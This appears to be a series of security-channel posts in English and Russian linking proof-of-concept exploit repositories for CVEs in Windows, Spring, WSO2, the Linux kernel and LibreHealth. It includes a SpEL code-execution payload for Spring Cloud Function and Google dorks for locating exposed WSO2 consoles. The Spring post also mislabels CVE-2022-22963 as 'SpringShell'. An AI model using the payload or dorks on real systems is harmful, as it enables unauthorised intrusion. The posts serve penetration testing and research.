CVE-2022-21971: Windows Runtime RCE

https://github.com/0vercl0k/CVE-2022-21971

#git #exploit #pentest

SpringShell: Spring Core RCE
(CVE-2022-22963)

PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")

Research:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html

Exploit:
https://github.com/craig/SpringCore0day

#spring #exploit #rce #cve

WSO2 RCE (CVE-2022-29464)

Critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading malicious JSP files.

Google Dorks:

inurl:"/carbon/admin/login.jsp"
inurl:"/authenticationendpoint/login.do"
inurl:"devportal/apis"
intitle:"API Publisher- Login"
intitle:"WSO2 Management Console"

https://github.com/hakivvi/CVE-2022-29464

#wso2 #rce #exploit

Во время стажировки в NitroTeam (@nitroteamchat), студенты нашли множественные уязвимости в LibreHealth: Broken Access Control (CVE-2022-31496), Cross-Site Scripting (CVE-2022-31492, CVE-2022-31493, CVE-2022-31494, CVE-2022-31495, CVE-2022-31497, CVE-2022-31498).

Имена наших героев: Alibek Akhmetov, Bakdaulet Zhaksylyk, Daniyar Absadykov, Amir Askarov, Gaukhar Uzakbay.

Так как их менторством занимался я, решил опубликовать статью на своем блоге:
https://murat.one/?p=169

P.S. Завтра напишу короткий гайдлайн для тех, кто хочет оформить CVE для найденной уязвимости, и опубликую на канале.

#php #librehealth #opensource #0day #exploit

@onebrick

CVE-2022-34918: Linux Kernel LPE PoC

https://github.com/randorisec/CVE-2022-34918-LPE-PoC

+ ресерч: https://randorisec.fr/crack-linux-firewall/

#exploit #git

Чекер виндовых CVE

https://github.com/BC-SECURITY/Moriarty

* Windows 10 (1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H2)
* Windows 11 (21H2, 22H2)
* Windows Server 2016, 20 19, 2022

#exploit #cve #pentest #redteam #ad